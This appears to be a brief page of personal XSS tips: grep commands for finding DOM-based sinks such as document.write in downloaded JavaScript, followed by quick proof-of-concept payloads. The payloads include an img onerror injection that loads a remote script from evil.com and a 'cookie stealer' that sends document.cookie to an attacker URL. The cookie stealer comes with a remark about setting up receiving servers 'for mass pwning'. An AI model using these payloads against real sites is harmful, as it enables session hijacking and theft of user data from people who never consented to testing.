XSS Tips #
DOM Based #
- Hunting (do this where downloaded JS folder is)
- Simple
document.writesearch:1
grep -r "document.write" ./ --include "*.html" - If the user input is a variable from another js, search the variable with
<VARIABLE>- note: there could the a space between the variable being assigned and the '=' sign\
1
grep -ER "<VARIABLE>[ ]+=" ./
- note: there could the a space between the variable being assigned and the '=' sign\
- Simple
Quick PoC Payloads #
imgtag to CSRF1
<img src=a onerror="x=document.createElement('script');x.src='https://evil.com/really_evil.js';document.body.appendChild(x)" />- Class cookie stealer
- You may setup receiving servers, APIs, webhook for mass pwning
1
<img src=a onerror="location.href='https://evil.com/stealer.php?cookie='+document.cookie;">
- You may setup receiving servers, APIs, webhook for mass pwning
- iFrame
1
<iframe src="javascript:alert(1)">
Last update: February 22, 2022